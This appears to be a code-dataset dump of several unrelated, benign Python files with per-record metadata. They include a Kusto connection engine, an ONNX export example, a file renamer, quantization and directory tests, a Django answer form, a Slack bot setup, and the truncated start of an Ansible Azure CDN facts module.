# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- from Kqlmagic.kql_engine import KqlEngine, KqlEngineError from Kqlmagic.kusto_client import Kusto_Client from Kqlmagic.constants import ConnStrKeys class KustoEngine(KqlEngine): # Constants # --------- _URI_SCHEMA_NAME = "azuredataexplorer" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA1_NAME = "adx" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA2_NAME = "ade" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA3_NAME = "kusto" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA_NAMES = [_URI_SCHEMA_NAME, _ALT_URI_SCHEMA1_NAME, _ALT_URI_SCHEMA2_NAME, _ALT_URI_SCHEMA3_NAME] _MANDATORY_KEY = ConnStrKeys.DATABASE _VALID_KEYS_COMBINATIONS = [ [ConnStrKeys.TENANT, ConnStrKeys.ANONYMOUS, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.CODE, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.USERNAME, ConnStrKeys.PASSWORD, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.CLIENTID, ConnStrKeys.CLIENTSECRET, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ ConnStrKeys.TENANT, ConnStrKeys.CLIENTID, ConnStrKeys.CERTIFICATE, ConnStrKeys.CERTIFICATE_THUMBPRINT, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS, ], ] # Class methods # ------------- # Instance methods # ---------------- def __init__(self, conn_str, user_ns: dict, current=None, conn_class=None): super().__init__() if isinstance(conn_str, dict): self.conn_class = conn_class self.database_name = conn_str.get(ConnStrKeys.DATABASE) self.cluster_name = conn_str.get(ConnStrKeys.CLUSTER) self.alias = conn_str.get(ConnStrKeys.ALIAS) self.bind_url = "{0}://{1}('{2}').{3}('{4}')".format( self._URI_SCHEMA_NAME, ConnStrKeys.CLUSTER, self.cluster_name, ConnStrKeys.DATABASE, self.database_name ) else: self._parsed_conn = self._parse_common_connection_str( conn_str, current, self._URI_SCHEMA_NAME, self._MANDATORY_KEY, self._VALID_KEYS_COMBINATIONS, user_ns ) self.client = Kusto_Client(self._parsed_conn) def get_client(self): if self.client is None: cluster_connection = self.conn_class.get_connection_by_name("@" + self.cluster_name) if cluster_connection is None: raise KqlEngineError("connection to cluster not set.") return cluster_connection.get_client() else: return self.client
en
0.662444
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- # Constants # --------- # no spaces, underscores, and hyphe-minus, because they are ignored in parser # no spaces, underscores, and hyphe-minus, because they are ignored in parser # no spaces, underscores, and hyphe-minus, because they are ignored in parser # no spaces, underscores, and hyphe-minus, because they are ignored in parser # Class methods # ------------- # Instance methods # ----------------
1.897387
2
src/python/nimbusml/examples/examples_from_dataframe/OnnxRunner_df.py
montehoover/NimbusML
134
6627868
import os import tempfile import numpy as np import pandas as pd from nimbusml import Pipeline from nimbusml.preprocessing import OnnxRunner from nimbusml.preprocessing.normalization import MinMaxScaler def get_tmp_file(suffix=None): fd, file_name = tempfile.mkstemp(suffix=suffix) fl = os.fdopen(fd, 'w') fl.close() return file_name # Generate the train and test data np.random.seed(0) x = np.arange(100, step=0.1) y = x * 10 + (np.random.standard_normal(len(x)) * 10) train_data = {'c1': x, 'c2': y} train_df = pd.DataFrame(train_data).astype({'c1': np.float32, 'c2': np.float32}) test_data = {'c1': [2.5, 30.5], 'c2': [1, 1]} test_df = pd.DataFrame(test_data).astype({'c1': np.float32, 'c2': np.float32}) # Fit a MinMaxScaler Pipeline r1 = Pipeline([MinMaxScaler()]) r1.fit(train_df) # Export the pipeline to ONNX onnx_path = get_tmp_file('.onnx') r1.export_to_onnx(onnx_path, 'com.microsoft.ml', onnx_version='Stable') # Perform the transform using the standard ML.Net backend result_standard = r1.transform(test_df) print(result_standard) # c1 c2 # 0 0.025025 0.000998 # 1 0.305305 0.000998 # Perform the transform using the ONNX backend. # Note, the extra columns and column name differences # is a known issue with the ML.Net backend. onnxrunner = OnnxRunner(model_file=onnx_path) result_onnx = onnxrunner.fit_transform(test_df) print(result_onnx) # c1 c2 c12.0 c22.0 # 0 2.5 1.0 0.025025 0.000998 # 1 30.5 1.0 0.305305 0.000998
import os import tempfile import numpy as np import pandas as pd from nimbusml import Pipeline from nimbusml.preprocessing import OnnxRunner from nimbusml.preprocessing.normalization import MinMaxScaler def get_tmp_file(suffix=None): fd, file_name = tempfile.mkstemp(suffix=suffix) fl = os.fdopen(fd, 'w') fl.close() return file_name # Generate the train and test data np.random.seed(0) x = np.arange(100, step=0.1) y = x * 10 + (np.random.standard_normal(len(x)) * 10) train_data = {'c1': x, 'c2': y} train_df = pd.DataFrame(train_data).astype({'c1': np.float32, 'c2': np.float32}) test_data = {'c1': [2.5, 30.5], 'c2': [1, 1]} test_df = pd.DataFrame(test_data).astype({'c1': np.float32, 'c2': np.float32}) # Fit a MinMaxScaler Pipeline r1 = Pipeline([MinMaxScaler()]) r1.fit(train_df) # Export the pipeline to ONNX onnx_path = get_tmp_file('.onnx') r1.export_to_onnx(onnx_path, 'com.microsoft.ml', onnx_version='Stable') # Perform the transform using the standard ML.Net backend result_standard = r1.transform(test_df) print(result_standard) # c1 c2 # 0 0.025025 0.000998 # 1 0.305305 0.000998 # Perform the transform using the ONNX backend. # Note, the extra columns and column name differences # is a known issue with the ML.Net backend. onnxrunner = OnnxRunner(model_file=onnx_path) result_onnx = onnxrunner.fit_transform(test_df) print(result_onnx) # c1 c2 c12.0 c22.0 # 0 2.5 1.0 0.025025 0.000998 # 1 30.5 1.0 0.305305 0.000998
en
0.665048
# Generate the train and test data # Fit a MinMaxScaler Pipeline # Export the pipeline to ONNX # Perform the transform using the standard ML.Net backend # c1 c2 # 0 0.025025 0.000998 # 1 0.305305 0.000998 # Perform the transform using the ONNX backend. # Note, the extra columns and column name differences # is a known issue with the ML.Net backend. # c1 c2 c12.0 c22.0 # 0 2.5 1.0 0.025025 0.000998 # 1 30.5 1.0 0.305305 0.000998
2.776532
3
misc/renNumPlDl.py
gxjit/PyUtils
0
6627869
import argparse import pathlib import re def parseArgs(): def dirPath(pth): pthObj = pathlib.Path(pth) if pthObj.is_dir(): return pthObj else: raise argparse.ArgumentTypeError("Invalid Directory path") parser = argparse.ArgumentParser(description="Does Stuff.") parser.add_argument("dir", metavar="DirPath", help="Directory path", type=dirPath) return parser.parse_args() dirPath = parseArgs().dir.resolve() fiveD = re.compile(r"\d{5}") for file in dirPath.iterdir(): if not file.is_file() or file.suffix != ".m4a": continue newName = file.stem for i in re.findall(fiveD, file.stem): newName = newName.replace(i, str(int(i))) # print("\n----") # print(file.stem) # print(newName) # print("----\n") file.rename(dirPath.joinpath(f"{newName}{file.suffix}"))
import argparse import pathlib import re def parseArgs(): def dirPath(pth): pthObj = pathlib.Path(pth) if pthObj.is_dir(): return pthObj else: raise argparse.ArgumentTypeError("Invalid Directory path") parser = argparse.ArgumentParser(description="Does Stuff.") parser.add_argument("dir", metavar="DirPath", help="Directory path", type=dirPath) return parser.parse_args() dirPath = parseArgs().dir.resolve() fiveD = re.compile(r"\d{5}") for file in dirPath.iterdir(): if not file.is_file() or file.suffix != ".m4a": continue newName = file.stem for i in re.findall(fiveD, file.stem): newName = newName.replace(i, str(int(i))) # print("\n----") # print(file.stem) # print(newName) # print("----\n") file.rename(dirPath.joinpath(f"{newName}{file.suffix}"))
en
0.191729
# print("\n----") # print(file.stem) # print(newName) # print("----\n")
3.304115
3
NightlyTests/torch/test_ignoring_layers_for_quantization_MNIST.py
Rohan-Chaudhury/aimet
3
6627870
# /usr/bin/env python3.5 # -*- mode: python -*- # ============================================================================= # @@-COPYRIGHT-START-@@ # # Copyright (c) 2018, Qualcomm Innovation Center, Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # SPDX-License-Identifier: BSD-3-Clause # # @@-COPYRIGHT-END-@@ # ============================================================================= import unittest import torch import torch.nn as nn from aimet_torch import quantizer as q from aimet_common.utils import AimetLogger import aimet_torch.examples.mnist_torch_model as mnist_model logger = AimetLogger.get_area_logger(AimetLogger.LogAreas.Test) class IgnoreLayers(unittest.TestCase): def test_quantizer_with_ignoring_layers(self): torch.cuda.empty_cache() net = mnist_model.Net() model = net.to(torch.device('cpu')) quantizer = q.Quantizer(model=model, use_cuda=False) layers_to_ignore = [net.conv1, net.fc2] quantizer.quantize_net(bw_params=8, bw_acts=8, run_model=mnist_model.evaluate, iterations=1, layers_to_ignore=layers_to_ignore) self.assertTrue(isinstance(net.conv1, nn.Conv2d)) self.assertFalse(isinstance(net.conv2, nn.Conv2d)) self.assertTrue(isinstance(net.fc2, nn.Linear)) print("Quantized Model", model)
# /usr/bin/env python3.5 # -*- mode: python -*- # ============================================================================= # @@-COPYRIGHT-START-@@ # # Copyright (c) 2018, Qualcomm Innovation Center, Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # SPDX-License-Identifier: BSD-3-Clause # # @@-COPYRIGHT-END-@@ # ============================================================================= import unittest import torch import torch.nn as nn from aimet_torch import quantizer as q from aimet_common.utils import AimetLogger import aimet_torch.examples.mnist_torch_model as mnist_model logger = AimetLogger.get_area_logger(AimetLogger.LogAreas.Test) class IgnoreLayers(unittest.TestCase): def test_quantizer_with_ignoring_layers(self): torch.cuda.empty_cache() net = mnist_model.Net() model = net.to(torch.device('cpu')) quantizer = q.Quantizer(model=model, use_cuda=False) layers_to_ignore = [net.conv1, net.fc2] quantizer.quantize_net(bw_params=8, bw_acts=8, run_model=mnist_model.evaluate, iterations=1, layers_to_ignore=layers_to_ignore) self.assertTrue(isinstance(net.conv1, nn.Conv2d)) self.assertFalse(isinstance(net.conv2, nn.Conv2d)) self.assertTrue(isinstance(net.fc2, nn.Linear)) print("Quantized Model", model)
en
0.667523
# /usr/bin/env python3.5 # -*- mode: python -*- # ============================================================================= # @@-COPYRIGHT-START-@@ # # Copyright (c) 2018, Qualcomm Innovation Center, Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # SPDX-License-Identifier: BSD-3-Clause # # @@-COPYRIGHT-END-@@ # =============================================================================
1.058817
1
src/parser.py
copyrosicky/MlbEngagementCompetition
7
6627871
# import ujson import json import pandas as pd from src.row import Row def _to_datetime(d): if 'date' in d: date = d['date'] else: date = d.name return pd.to_datetime(date, format='%Y%m%d').to_numpy() def parse_row(row: pd.Series): def _parse(_row, idx): if idx in _row and not pd.isnull(_row[idx]): return json.loads(_row[idx]) else: return [] return Row( date=_to_datetime(row), engagement=_parse(row, 'nextDayPlayerEngagement'), games=_parse(row, 'games'), rosters=_parse(row, 'rosters'), player_box_scores=_parse(row, 'playerBoxScores'), team_box_scores=_parse(row, 'teamBoxScores'), transactions=_parse(row, 'transactions'), standings=_parse(row, 'standings'), awards=_parse(row, 'awards'), events=_parse(row, 'events'), player_twitter_followers=_parse(row, 'playerTwitterFollowers'), team_twitter_followers=_parse(row, 'teamTwitterFollowers') ) def make_df_base_from_test(df: pd.DataFrame) -> pd.DataFrame: df = df.reset_index() df['playerId'] = df['date_playerId'].apply(lambda x: int(x.split('_')[1])) df['dailyDataDate'] = _to_datetime(df) return df[['dailyDataDate', 'date', 'playerId', 'target1', 'target2', 'target3', 'target4']].set_index('date') def make_df_base_from_train_engagement(df: pd.DataFrame) -> pd.DataFrame: df['date'] = df['dailyDataDate'] df['dailyDataDate'] = _to_datetime(df) return df[['dailyDataDate', 'date', 'playerId', 'target1', 'target2', 'target3', 'target4']].set_index('date')
# import ujson import json import pandas as pd from src.row import Row def _to_datetime(d): if 'date' in d: date = d['date'] else: date = d.name return pd.to_datetime(date, format='%Y%m%d').to_numpy() def parse_row(row: pd.Series): def _parse(_row, idx): if idx in _row and not pd.isnull(_row[idx]): return json.loads(_row[idx]) else: return [] return Row( date=_to_datetime(row), engagement=_parse(row, 'nextDayPlayerEngagement'), games=_parse(row, 'games'), rosters=_parse(row, 'rosters'), player_box_scores=_parse(row, 'playerBoxScores'), team_box_scores=_parse(row, 'teamBoxScores'), transactions=_parse(row, 'transactions'), standings=_parse(row, 'standings'), awards=_parse(row, 'awards'), events=_parse(row, 'events'), player_twitter_followers=_parse(row, 'playerTwitterFollowers'), team_twitter_followers=_parse(row, 'teamTwitterFollowers') ) def make_df_base_from_test(df: pd.DataFrame) -> pd.DataFrame: df = df.reset_index() df['playerId'] = df['date_playerId'].apply(lambda x: int(x.split('_')[1])) df['dailyDataDate'] = _to_datetime(df) return df[['dailyDataDate', 'date', 'playerId', 'target1', 'target2', 'target3', 'target4']].set_index('date') def make_df_base_from_train_engagement(df: pd.DataFrame) -> pd.DataFrame: df['date'] = df['dailyDataDate'] df['dailyDataDate'] = _to_datetime(df) return df[['dailyDataDate', 'date', 'playerId', 'target1', 'target2', 'target3', 'target4']].set_index('date')
fr
0.344587
# import ujson
2.722677
3
web/forms.py
Hedwika/Czechitas-Data-Games
1
6627872
import math from datetime import datetime from django import forms from web import models from web.models import Assignment class RightAnswer(forms.Form): answer = forms.CharField(max_length=200, label="", widget=forms.TextInput(attrs={"class": "form-control"})) assignment: models.Assignment def __init__(self, *args, **kwargs): self.assignment = kwargs.pop("assignment") super().__init__(*args, **kwargs) def clean(self): cleaned_data = super().clean() if self.assignment.answer_type == 'SEZNAM': right_answer = list(map(lambda x: x.strip(), self.assignment.right_answer.split(","))) answer = cleaned_data["answer"] if "," not in answer: raise forms.ValidationError("Odpověď musí být seznam a musí obsahovat alespoň dvě " "hodnoty oddělené čárkou.") answer = list(map(lambda x: x.strip(), answer.split(","))) if not set(right_answer) == set(answer): raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") elif self.assignment.answer_type == 'ČÍSLO': right_answer = float(self.assignment.right_answer) answer = cleaned_data["answer"] if "," in answer: raise forms.ValidationError("Je třeba používat desetinnou tečku, nikoli desetinnou čárku.") elif not answer.replace('.', '', 1).isdigit(): raise forms.ValidationError("Odpověď musí být číslo!") else: answer = float(cleaned_data["answer"]) if round(answer, 2) != round(right_answer, 2): raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") else: if cleaned_data["answer"] != self.assignment.right_answer: raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") return cleaned_data
import math from datetime import datetime from django import forms from web import models from web.models import Assignment class RightAnswer(forms.Form): answer = forms.CharField(max_length=200, label="", widget=forms.TextInput(attrs={"class": "form-control"})) assignment: models.Assignment def __init__(self, *args, **kwargs): self.assignment = kwargs.pop("assignment") super().__init__(*args, **kwargs) def clean(self): cleaned_data = super().clean() if self.assignment.answer_type == 'SEZNAM': right_answer = list(map(lambda x: x.strip(), self.assignment.right_answer.split(","))) answer = cleaned_data["answer"] if "," not in answer: raise forms.ValidationError("Odpověď musí být seznam a musí obsahovat alespoň dvě " "hodnoty oddělené čárkou.") answer = list(map(lambda x: x.strip(), answer.split(","))) if not set(right_answer) == set(answer): raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") elif self.assignment.answer_type == 'ČÍSLO': right_answer = float(self.assignment.right_answer) answer = cleaned_data["answer"] if "," in answer: raise forms.ValidationError("Je třeba používat desetinnou tečku, nikoli desetinnou čárku.") elif not answer.replace('.', '', 1).isdigit(): raise forms.ValidationError("Odpověď musí být číslo!") else: answer = float(cleaned_data["answer"]) if round(answer, 2) != round(right_answer, 2): raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") else: if cleaned_data["answer"] != self.assignment.right_answer: raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") return cleaned_data
none
1
2.368672
2
garbo/storage/__init__.py
natict/garbo
1
6627873
<filename>garbo/storage/__init__.py __author__ = 'nati'
<filename>garbo/storage/__init__.py __author__ = 'nati'
none
1
1.076472
1
markov_slackbot/main.py
bigshebang/clovis
0
6627874
<reponame>bigshebang/clovis # -*- coding: utf-8 -*- import json from os import path, makedirs, walk from markov_slackbot.markov_slackbot import MarkovSlackbot def markov_slackbot(config_file): """API equivalent to using markov_slackbot at the command line. :param config_file: User configuration path file. """ config = json.loads(open(config_file).read()) markov_slackbot = MarkovSlackbot(config) markov_slackbot.start() def generate_example_config_file(): """Create an example config file. """ example_config = { 'SLACK_TOKEN': 'your token <PASSWORD>', 'slack_log_dir': 'slack_logs', 'clean_chatlog_dir': 'clean_logs', 'external_texts_dir': 'external_texts', 'send_mentions': False, 'LOG_LEVEL': 'DEBUG', 'SILENT_CHANNELS_FILE': 'silent_channels.json' } example_config_json = json.dumps(example_config, sort_keys=True, indent=4) example_config_file = open('config.json.example', 'a') example_config_file.seek(0) example_config_file.truncate() example_config_file.write(example_config_json) def prepare_environment(): """Prepare the environment for the bot. """ if not path.exists('slack_logs'): makedirs('slack_logs') if not path.exists('external_texts'): makedirs('external_texts') generate_example_config_file()
# -*- coding: utf-8 -*- import json from os import path, makedirs, walk from markov_slackbot.markov_slackbot import MarkovSlackbot def markov_slackbot(config_file): """API equivalent to using markov_slackbot at the command line. :param config_file: User configuration path file. """ config = json.loads(open(config_file).read()) markov_slackbot = MarkovSlackbot(config) markov_slackbot.start() def generate_example_config_file(): """Create an example config file. """ example_config = { 'SLACK_TOKEN': 'your token <PASSWORD>', 'slack_log_dir': 'slack_logs', 'clean_chatlog_dir': 'clean_logs', 'external_texts_dir': 'external_texts', 'send_mentions': False, 'LOG_LEVEL': 'DEBUG', 'SILENT_CHANNELS_FILE': 'silent_channels.json' } example_config_json = json.dumps(example_config, sort_keys=True, indent=4) example_config_file = open('config.json.example', 'a') example_config_file.seek(0) example_config_file.truncate() example_config_file.write(example_config_json) def prepare_environment(): """Prepare the environment for the bot. """ if not path.exists('slack_logs'): makedirs('slack_logs') if not path.exists('external_texts'): makedirs('external_texts') generate_example_config_file()
en
0.677073
# -*- coding: utf-8 -*- API equivalent to using markov_slackbot at the command line. :param config_file: User configuration path file. Create an example config file. Prepare the environment for the bot.
2.791404
3
pytmpdir/DirectoryTest.py
brentonford/pytmpdir
0
6627875
<reponame>brentonford/pytmpdir # Created by Synerty Pty Ltd # Copyright (C) 2013-2017 Synerty Pty Ltd (Australia) # # This software is open source, the MIT license applies. # # Website : http://www.synerty.com # Support : <EMAIL> import os import random import string import unittest from tempfile import mkstemp from pytmpdir.Directory import Directory, FileClobberError, isWindows class DirectoryTest(unittest.TestCase): @classmethod def makeRandomContents(cls, size=100): return ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(size)]) @classmethod def makeRandomDirectory(cls): directory = Directory() dirs = [''] def addRecursiveDirs(path): if len(dirs) > 20: return for d in range(5): newPath = os.path.join(path, cls.makeRandomContents(10)) # print "Creating new path %s" % newPath dirs.append(newPath) addRecursiveDirs(newPath) for x in range(10): f = directory.createFile(path=newPath, name=cls.makeRandomContents(10)) with f.open(write=True) as fobj: fobj.write(cls.makeRandomContents(4000)) addRecursiveDirs('') return directory # Create files with bad paths @unittest.skipUnless(isWindows, "Not Windows detected, skipping " "testCreateWindowsBadPaths.") def testCreateWindowsBadPaths(self): d = Directory() self.assertEqual(d.createFile(pathName="\\abspath\\name1").pathName, 'abspath\\name1') self.assertEqual(d.createFile(pathName="relpath\\name2").pathName, "relpath\\name2") self.assertRaises(AssertionError, d.createFile, pathName="\\abspath\\dir1\\") self.assertRaises(AssertionError, d.createFile, pathName="relpath\\dir2\\") self.assertEqual(2, len(d.files)) print("COMPLETED testCreateWindowsBadPaths") @unittest.skipIf(isWindows, "Windows detected, skipping testCreateLinuxBadPaths.") def testCreateLinuxBadPaths(self): d = Directory() self.assertEqual(d.createFile(pathName="/abspath/name1").pathName, 'abspath/name1') self.assertEqual(d.createFile(pathName="relpath/name2").pathName, "relpath/name2") self.assertRaises(AssertionError, d.createFile, pathName="/abspath/dir1/") self.assertRaises(AssertionError, d.createFile, pathName="relpath/dir2/") self.assertEqual(2, len(d.files)) print("COMPLETED testCreateLinuxBadPaths") def testDir(self): d = Directory() assert (os.path.isdir(d.path)) num = 10 for x in range(num): (fd, name) = mkstemp(dir=d.path) with os.fdopen(fd, 'w') as f: f.write(self.makeRandomContents()) d.scan() self.assertEqual(num, len(d.files)) for x in range(num): d.createFile(name=self.makeRandomContents(10)) d.createFile(path=self.makeRandomContents(10), name=self.makeRandomContents(10)) # Create a file that already exists d.createFile(pathName="clobber1") self.assertRaises(FileClobberError, d.createFile, pathName="clobber1") self.assertEqual(num * 3 + 1, len(d.files)) files = d.files[:] removeIndexes = list(range(0, len(files), 3)) [files[i].delete() for i in removeIndexes] self.assertEqual(len(d.files), len(files) - len(removeIndexes)) dirPath = d.path d = None self.assertFalse(os.path.isdir(dirPath)) print("COMPLETED makeRandomContents")
# Created by Synerty Pty Ltd # Copyright (C) 2013-2017 Synerty Pty Ltd (Australia) # # This software is open source, the MIT license applies. # # Website : http://www.synerty.com # Support : <EMAIL> import os import random import string import unittest from tempfile import mkstemp from pytmpdir.Directory import Directory, FileClobberError, isWindows class DirectoryTest(unittest.TestCase): @classmethod def makeRandomContents(cls, size=100): return ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(size)]) @classmethod def makeRandomDirectory(cls): directory = Directory() dirs = [''] def addRecursiveDirs(path): if len(dirs) > 20: return for d in range(5): newPath = os.path.join(path, cls.makeRandomContents(10)) # print "Creating new path %s" % newPath dirs.append(newPath) addRecursiveDirs(newPath) for x in range(10): f = directory.createFile(path=newPath, name=cls.makeRandomContents(10)) with f.open(write=True) as fobj: fobj.write(cls.makeRandomContents(4000)) addRecursiveDirs('') return directory # Create files with bad paths @unittest.skipUnless(isWindows, "Not Windows detected, skipping " "testCreateWindowsBadPaths.") def testCreateWindowsBadPaths(self): d = Directory() self.assertEqual(d.createFile(pathName="\\abspath\\name1").pathName, 'abspath\\name1') self.assertEqual(d.createFile(pathName="relpath\\name2").pathName, "relpath\\name2") self.assertRaises(AssertionError, d.createFile, pathName="\\abspath\\dir1\\") self.assertRaises(AssertionError, d.createFile, pathName="relpath\\dir2\\") self.assertEqual(2, len(d.files)) print("COMPLETED testCreateWindowsBadPaths") @unittest.skipIf(isWindows, "Windows detected, skipping testCreateLinuxBadPaths.") def testCreateLinuxBadPaths(self): d = Directory() self.assertEqual(d.createFile(pathName="/abspath/name1").pathName, 'abspath/name1') self.assertEqual(d.createFile(pathName="relpath/name2").pathName, "relpath/name2") self.assertRaises(AssertionError, d.createFile, pathName="/abspath/dir1/") self.assertRaises(AssertionError, d.createFile, pathName="relpath/dir2/") self.assertEqual(2, len(d.files)) print("COMPLETED testCreateLinuxBadPaths") def testDir(self): d = Directory() assert (os.path.isdir(d.path)) num = 10 for x in range(num): (fd, name) = mkstemp(dir=d.path) with os.fdopen(fd, 'w') as f: f.write(self.makeRandomContents()) d.scan() self.assertEqual(num, len(d.files)) for x in range(num): d.createFile(name=self.makeRandomContents(10)) d.createFile(path=self.makeRandomContents(10), name=self.makeRandomContents(10)) # Create a file that already exists d.createFile(pathName="clobber1") self.assertRaises(FileClobberError, d.createFile, pathName="clobber1") self.assertEqual(num * 3 + 1, len(d.files)) files = d.files[:] removeIndexes = list(range(0, len(files), 3)) [files[i].delete() for i in removeIndexes] self.assertEqual(len(d.files), len(files) - len(removeIndexes)) dirPath = d.path d = None self.assertFalse(os.path.isdir(dirPath)) print("COMPLETED makeRandomContents")
en
0.739476
# Created by Synerty Pty Ltd # Copyright (C) 2013-2017 Synerty Pty Ltd (Australia) # # This software is open source, the MIT license applies. # # Website : http://www.synerty.com # Support : <EMAIL> # print "Creating new path %s" % newPath # Create files with bad paths # Create a file that already exists
2.322644
2
library/azure_rm_cdnprofile_facts.py
mc-corey50/Azure-Ansible
0
6627876
<filename>library/azure_rm_cdnprofile_facts.py #!/usr/bin/python # # Copyright (c) 2018 <NAME>, <<EMAIL>>, <NAME> <<EMAIL>> # # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: azure_rm_cdnprofile_facts version_added: "2.8" short_description: Get Azure CDN profile facts description: - Get facts for a specific Azure CDN profile or all CDN profiles. options: name: description: - Limit results to a specific CDN profile. resource_group: description: - The resource group to search for the desired CDN profile tags: description: - Limit results by providing a list of tags. Format tags as 'key' or 'key:value'. extends_documentation_fragment: - azure author: - "<NAME> <<EMAIL>>" - "Yunge Zhu <<EMAIL>>" ''' EXAMPLES = ''' - name: Get facts for one CDN profile azure_rm_cdnprofile_facts: name: Testing resource_group: TestRG - name: Get facts for all CDN profiles azure_rm_cdnprofile_facts: - name: Get facts by tags azure_rm_cdnprofile_facts: tags: - Environment:Test ''' RETURN = ''' cdnprofiles: description: List of CDN profiles. returned: always type: complex contains: resource_group: description: - Name of a resource group where the CDN profile exists. returned: always type: str sample: testGroup name: description: - Name of the CDN profile. returned: always type: str sample: Testing location: description: - Location of the CDN profile. type: str sample: WestUS id: description: - ID of the CDN profile. type: str 